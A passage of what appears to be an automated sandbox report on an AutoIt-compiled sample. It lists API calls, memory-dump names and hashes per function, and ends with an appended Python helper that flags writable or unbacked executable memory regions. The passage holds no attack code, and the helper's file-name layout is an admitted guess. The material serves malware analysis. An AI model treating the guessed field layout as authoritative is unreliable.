• CloseHandle.KERNEL32(00000000,?,?,?,?,003A9207,?,?,00000000,?), ref: 003ABAAD
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,003A9207,?,?,00000000,?), ref: 003ABABE
• OleLoadPicture.OLEAUT32(?,00000000,00000000,003B2CAC,?), ref: 003ABAD7
• GlobalFree.KERNEL32(00000000), ref: 003ABAE7
• GetObjectW.GDI32(00000000,00000018,?), ref: 003ABB0B
• CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 003ABB36
• DeleteObject.GDI32(00000000), ref: 003ABB5E
• SendMessageW.USER32(?,00000172,00000000,00000000), ref: 003ABB74
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
• String ID:
• API String ID: 3840717409-0
• Opcode ID: 40f5bfdb26d6da46fb08e499110791ead7c64a2013f07450e7e77ac7e1de22f9
• Instruction ID: 867d83050b184cd81961f980a1d060e9aa39073fda3781bb3148f91b8ba85caf
• Opcode Fuzzy Hash: 40f5bfdb26d6da46fb08e499110791ead7c64a2013f07450e7e77ac7e1de22f9
• Instruction Fuzzy Hash: 54412675600208EFDB229FA5DC88EAABBBCFF8A711F104168F905D7261D7349E01CB60
APIs
• __wsplitpath.LIBCMT ref: 0038DA10
• _wcscat.LIBCMT ref: 0038DA28
• _wcscat.LIBCMT ref: 0038DA3A
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0038DA4F
• SetCurrentDirectoryW.KERNEL32(?), ref: 0038DA63
• GetFileAttributesW.KERNEL32(?), ref: 0038DA7B
• SetFileAttributesW.KERNEL32(?,00000000), ref: 0038DA95
• SetCurrentDirectoryW.KERNEL32(?), ref: 0038DAA7
Strings
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
• String ID: *.*
• API String ID: 34673085-438819550
• Opcode ID: 3a4f7982acb65ebafada1240e0de4ef93d64ea75a241fadfaca4de38d046605c
• Instruction ID: 2b2295dc05660ed9d8673864fd229b254398191047b109e81d056cf978591e32
• Opcode Fuzzy Hash: 3a4f7982acb65ebafada1240e0de4ef93d64ea75a241fadfaca4de38d046605c
• Instruction Fuzzy Hash: B88182715043419FCB26FF64C844A6AB7E8BF89310F19486EF889DB291E734DD45CB52
APIs
  • Part of subcall function 00322612: GetWindowLongW.USER32(?,000000EB), ref: 00322623
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 003AC1FC
• GetFocus.USER32 ref: 003AC20C
• GetDlgCtrlID.USER32(00000000), ref: 003AC217
• _memset.LIBCMT ref: 003AC342
• GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 003AC36D
• GetMenuItemCount.USER32(?), ref: 003AC38D
• GetMenuItemID.USER32(?,00000000), ref: 003AC3A0
• GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 003AC3D4
• GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 003AC41C
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 003AC454
• DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 003AC489
Strings
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
• String ID: 0
• API String ID: 1296962147-4108050209
• Opcode ID: 7c4eadc671c7c65a4d6525f322078372bb2b3838b27bccdd0370de5132f704d0
• Instruction ID: 24f9a5e15bab2347fc7ed316b6e203b39cef1cba15d79f5cfe41b354e8845f45
• Opcode Fuzzy Hash: 7c4eadc671c7c65a4d6525f322078372bb2b3838b27bccdd0370de5132f704d0
• Instruction Fuzzy Hash: ED81BE70618301AFDB22CF25C884A6BBBE8FF8A314F00592EF99597291C730D904CB92
APIs
• GetDC.USER32(00000000), ref: 0039738F
• CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0039739B
• CreateCompatibleDC.GDI32(?), ref: 003973A7
• SelectObject.GDI32(00000000,?), ref: 003973B4
• StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00397408
• GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00397444
• GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00397468
• SelectObject.GDI32(00000006,?), ref: 00397470
• DeleteObject.GDI32(?), ref: 00397479
• DeleteDC.GDI32(00000006), ref: 00397480
• ReleaseDC.USER32(00000000,?), ref: 0039748B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
• String ID: (
• API String ID: 2598888154-3887548279
• Opcode ID: e91aa368f5f666325248a322b0523021e0677d38e232b1a87dfe4cfcd7a69272
• Instruction ID: 3d6ca94aaae3cf109747df64deb31264b4a01659d0bc939b5d22e8a64c936cc4
• Opcode Fuzzy Hash: e91aa368f5f666325248a322b0523021e0677d38e232b1a87dfe4cfcd7a69272
• Instruction Fuzzy Hash: CC515A75A04309EFCB16CFA9CC85EAEBBB9EF49310F14842DF99997251C731A940CB90
APIs
  • Part of subcall function 00340957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00326B0C,?,00008000), ref: 00340973
  • Part of subcall function 00324750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00324743,?,?,003237AE,?), ref: 00324770
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00326BAD
• SetCurrentDirectoryW.KERNEL32(?), ref: 00326CFA
  • Part of subcall function 0032586D: _wcscpy.LIBCMT ref: 003258A5
  • Part of subcall function 0034363D: _iswctype.LIBCMT ref: 00343645
Strings
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
• String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
• API String ID: 537147316-1018226102
• Opcode ID: 02a645554e53e884b94641dd0ec97cfe5c4b8bfd215d34354dcb912b7e532a8d
• Instruction ID: 1c5e13f2b33590d65acb30089ad35a79488bcc2b3c4dd395fe2212031ebe2b3a
• Opcode Fuzzy Hash: 02a645554e53e884b94641dd0ec97cfe5c4b8bfd215d34354dcb912b7e532a8d
• Instruction Fuzzy Hash: FC02BF311083519FC726EF24D881AAFBBE5FF99354F10491DF8899B2A1DB30DA49CB52
APIs
• _memset.LIBCMT ref: 00382D50
• GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00382DDD
• GetMenuItemCount.USER32(003E5890), ref: 00382E66
• DeleteMenu.USER32(003E5890,00000005,00000000,000000F5,?,?), ref: 00382EF6
• DeleteMenu.USER32(003E5890,00000004,00000000), ref: 00382EFE
• DeleteMenu.USER32(003E5890,00000006,00000000), ref: 00382F06
• DeleteMenu.USER32(003E5890,00000003,00000000), ref: 00382F0E
• GetMenuItemCount.USER32(003E5890), ref: 00382F16
• SetMenuItemInfoW.USER32(003E5890,00000004,00000000,00000030), ref: 00382F4C
• GetCursorPos.USER32(?), ref: 00382F56
• SetForegroundWindow.USER32(00000000), ref: 00382F5F
• TrackPopupMenuEx.USER32(003E5890,00000000,?,00000000,00000000,00000000), ref: 00382F72
• PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00382F7E
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
• String ID:
• API String ID: 3993528054-0
• Opcode ID: 44e00285fd90e609ffa1cea11bdde56bacbe592de9fc2e1b83eb94299d113943
• Instruction ID: 240e784d49c46febf80bfba813d149e0fd9d07b4079484e15bfb5fc387512a8a
• Opcode Fuzzy Hash: 44e00285fd90e609ffa1cea11bdde56bacbe592de9fc2e1b83eb94299d113943
• Instruction Fuzzy Hash: FC71B270640305BEEB23AF64DC89FABBF68FF05354F140256F625AA1E1C7B16820D794
APIs
• VariantInit.OLEAUT32(?), ref: 003988D7
• CoInitialize.OLE32(00000000), ref: 00398904
• CoUninitialize.OLE32 ref: 0039890E
• GetRunningObjectTable.OLE32(00000000,?), ref: 00398A0E
• SetErrorMode.KERNEL32(00000001,00000029), ref: 00398B3B
• CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,003B2C0C), ref: 00398B6F
• CoGetObject.OLE32(?,00000000,003B2C0C,?), ref: 00398B92
• SetErrorMode.KERNEL32(00000000), ref: 00398BA5
• SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00398C25
• VariantClear.OLEAUT32(?), ref: 00398C35
Strings
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
• String ID: ,,;
• API String ID: 2395222682-1177347100
• Opcode ID: 1439bd1fc63114c3379de12d5f05abfd6f272c73ae5721e7ede7b42a5da7b25b
• Instruction ID: 9abf08904dbfdf0f636b91490ba95d5cd2fd71a427d264e692e5e10335e70759
• Opcode Fuzzy Hash: 1439bd1fc63114c3379de12d5f05abfd6f272c73ae5721e7ede7b42a5da7b25b
• Instruction Fuzzy Hash: 6EC136B1608305AFDB01DF68C88496BB7E9FF8A348F04491DF98A9B251DB71ED05CB52
APIs
  • Part of subcall function 00327BCC: _memmove.LIBCMT ref: 00327C06
• _memset.LIBCMT ref: 0037786B
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 003778A0
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 003778BC
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 003778D8
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00377902
• CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0037792A
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00377935
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0037793A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
• String ID: SOFTWARE\Classes\$\CLSID$\IPC$
• API String ID: 1411258926-22481851
• Opcode ID: 057ce387746124469e30c35ce6ca9020271d81ba229389185fcb785f76403021
• Instruction ID: 4b584982b4337f4bc5adf72b41b0750e5cb2bda989662612f86fa71c4cae9770
• Opcode Fuzzy Hash: 057ce387746124469e30c35ce6ca9020271d81ba229389185fcb785f76403021
• Instruction Fuzzy Hash: 4141FA72C14229ABCF22EFA4EC45DEDB778BF04350F414469E915A7161EB349E04CB90
APIs
• CharUpperBuffW.USER32(?,?,?,?,?,?,?,0039FDAD,?,?), ref: 003A0E31
Strings
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: BuffCharUpper
• String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
• API String ID: 3964851224-909552448
• Opcode ID: 33fa86c5e372472a1b3d3fd862c7ff541f376da7fe263870f73a09720662a250
• Instruction ID: 614ff43b23a9083499694168e2232e5af618d28c8241db821597a8822aab87cc
• Opcode Fuzzy Hash: 33fa86c5e372472a1b3d3fd862c7ff541f376da7fe263870f73a09720662a250
• Instruction Fuzzy Hash: 6A413D3664024A8FCF1BEF10E895AEE37A4FF12354F150456FC552F292DB34A95ACBA0
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0035E2A0,00000010,?,Bad directive syntax error,003AF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0037F7C2
• LoadStringW.USER32(00000000,?,0035E2A0,00000010), ref: 0037F7C9
  • Part of subcall function 00327DE1: _memmove.LIBCMT ref: 00327E22
• _wprintf.LIBCMT ref: 0037F7FC
• __swprintf.LIBCMT ref: 0037F81E
• MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0037F88D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
• String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
• API String ID: 1506413516-4153970271
• Opcode ID: 0cda302c74da3ace6b22f8e5714618040067fb2524b1d2d641be970e38470425
• Instruction ID: 40fab282a51a131c7a989c673c4758e153001b55888a21e5d9fc6f246ec0159c
• Opcode Fuzzy Hash: 0cda302c74da3ace6b22f8e5714618040067fb2524b1d2d641be970e38470425
• Instruction Fuzzy Hash: 69214F3294022EBFCF13EF90DC4AEEE7779BF14300F044466F5156A1A1DA71A658DB51
APIs
  • Part of subcall function 00327BCC: _memmove.LIBCMT ref: 00327C06
  • Part of subcall function 00327924: _memmove.LIBCMT ref: 003279AD
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00385330
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00385346
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00385357
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00385369
• mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0038537A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: SendString$_memmove
• String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
• API String ID: 2279737902-1007645807
• Opcode ID: 171489db32578356c8d03c623c23b61f79547b6ae23545c8f95694b17ea350e1
• Instruction ID: 0876bb5ae96c0a4c514479e9eb5a8b08277d99beadaffa0c1ac2a714043abb06
• Opcode Fuzzy Hash: 171489db32578356c8d03c623c23b61f79547b6ae23545c8f95694b17ea350e1
• Instruction Fuzzy Hash: D8119432A5023979D762BB75EC4AEFF7B7CFB92B50F00046AB401A61D1DEA05D45CAA0
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
• String ID: 0.0.0.0
• API String ID: 208665112-3771769585
• Opcode ID: 23ac226ac57ac7dbdd13d1299d8bd033aee1e0cdc980e94b29e143f077a3d415
• Instruction ID: 639e20219a986788492dba0dead4e08048fdcf0f16a539e1fb1041a933827a26
• Opcode Fuzzy Hash: 23ac226ac57ac7dbdd13d1299d8bd033aee1e0cdc980e94b29e143f077a3d415
• Instruction Fuzzy Hash: EF11E7319002156FCB27BB709C4AEDA7BBCEF02711F0401BAF5559A091EF75D9818750
                                                                                                                    APIs
                                                                                                                    • timeGetTime.WINMM ref: 00384F7A
                                                                                                                      • Part of subcall function 0034049F: timeGetTime.WINMM(?,7694B400,00330E7B), ref: 003404A3
                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 00384FA6
                                                                                                                    • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00384FCA
                                                                                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00384FEC
                                                                                                                    • SetActiveWindow.USER32 ref: 0038500B
                                                                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00385019
                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00385038
                                                                                                                    • Sleep.KERNEL32(000000FA), ref: 00385043
                                                                                                                    • IsWindow.USER32 ref: 0038504F
                                                                                                                    • EndDialog.USER32(00000000), ref: 00385060
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                    • String ID: BUTTON
                                                                                                                    • API String ID: 1194449130-3405671355
                                                                                                                    • Opcode ID: 91cd9502e876b73cda4cf8f9c182aa9af04c42cf74090e222dccbc3b19542e87
                                                                                                                    • Instruction ID: 95fbc8c9a45e7cbc4d7dccf69d2add51fc9851d33b1b316571ee558aff3dc70e
                                                                                                                    • Opcode Fuzzy Hash: 91cd9502e876b73cda4cf8f9c182aa9af04c42cf74090e222dccbc3b19542e87
                                                                                                                    • Instruction Fuzzy Hash: 4A21A170604B45AFE7236FB0ECC9A363BADEB17785F041168F2028A2F1DB718D008B61
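Added example, not part of the Joe Sandbox report or its tooling: a small Python decoder for the .sdmp memory-dump file names listed under Memory Dump Source for each function record. The field layout (process index, analysis stage, dump id, base address, page protection, an undecoded field, allocation type, a trailing undecoded field) is an assumption inferred from the names on this page; the protection and type constants are the Windows MEMORY_BASIC_INFORMATION values from winnt.h. It rebuilds the region map relative to the reported image base (Offset: 00320000) and flags any executable region that is also writable or not backed by a PE image, which is the first check worth running over a set of dumps before reading the per-function disassembly.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Windows page-protection constants (winnt.h). Only the base protection
# bits are decoded; guard/nocache/writecombine modifier bits are masked off.
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTE_MASK = 0x10 | 0x20 | 0x40 | 0x80
WRITE_MASK = 0x04 | 0x08 | 0x40 | 0x80

# MEMORY_BASIC_INFORMATION.Type values (winnt.h).
MEM_IMAGE = 0x1000000
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}

# Field layout is an ASSUMPTION inferred from the names on this page:
# <proc>.<stage>.<dump id>.<base, 16 hex>.<protect>.<field6>.<type>.<field8>.sdmp
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9a-fA-F]{8})\.(?P<stage>[0-9a-fA-F]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9a-fA-F]{16})\.(?P<protect>[0-9a-fA-F]{8})\.(?P<field6>[0-9a-fA-F]{8})\."
    r"(?P<mtype>[0-9a-fA-F]{8})\.(?P<field8>[0-9a-fA-F]{8})\.sdmp$"
)


@dataclass
class Region:
    name: str
    process: int
    stage: int
    dump_id: int
    base: int
    protect: int
    mem_type: int

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECTION.get(self.protect & 0xFF, f"0x{self.protect:x}")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:x}")

    @property
    def executable(self) -> bool:
        return bool(self.protect & EXECUTE_MASK)

    @property
    def writable(self) -> bool:
        return bool(self.protect & WRITE_MASK)

    def rva(self, image_base: int) -> int:
        """Offset of the region from the 'Offset:' image base the report gives."""
        return self.base - image_base


def parse_sdmp(name: str) -> Optional[Region]:
    """Return a Region for a Joe Sandbox .sdmp name, or None if it does not match."""
    m = SDMP_RE.match(name.strip())
    if not m:
        return None
    return Region(
        name=name.strip(),
        process=int(m["proc"], 16),
        stage=int(m["stage"], 16),
        dump_id=int(m["dump"]),
        base=int(m["base"], 16),
        protect=int(m["protect"], 16),
        mem_type=int(m["mtype"], 16),
    )


def suspicious_regions(regions: List[Region]) -> List[Region]:
    """Executable regions that are writable too, or not backed by a PE image:
    the usual first stop when triaging dumps for unpacked or injected code."""
    return [r for r in regions if r.executable and (r.writable or r.mem_type != MEM_IMAGE)]


# The dump names listed for the function records in this report.
REPORT_DUMPS = [
    "00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp",
]
IMAGE_BASE = 0x320000  # "Offset: 00320000" in the report


def region_table(names: List[str] = REPORT_DUMPS, image_base: int = IMAGE_BASE) -> List[str]:
    """One printable row per parsable dump: base, RVA from image base, protection, type."""
    rows = []
    for r in filter(None, map(parse_sdmp, names)):
        rows.append(f"{r.base:#010x}  rva={r.rva(image_base):#08x}  {r.protect_name:<22} {r.type_name}")
    return rows


if __name__ == "__main__":
    print("\n".join(region_table()))
    regs = [r for r in map(parse_sdmp, REPORT_DUMPS) if r]
    print("suspicious:", [hex(r.base) for r in suspicious_regions(regs)])
```

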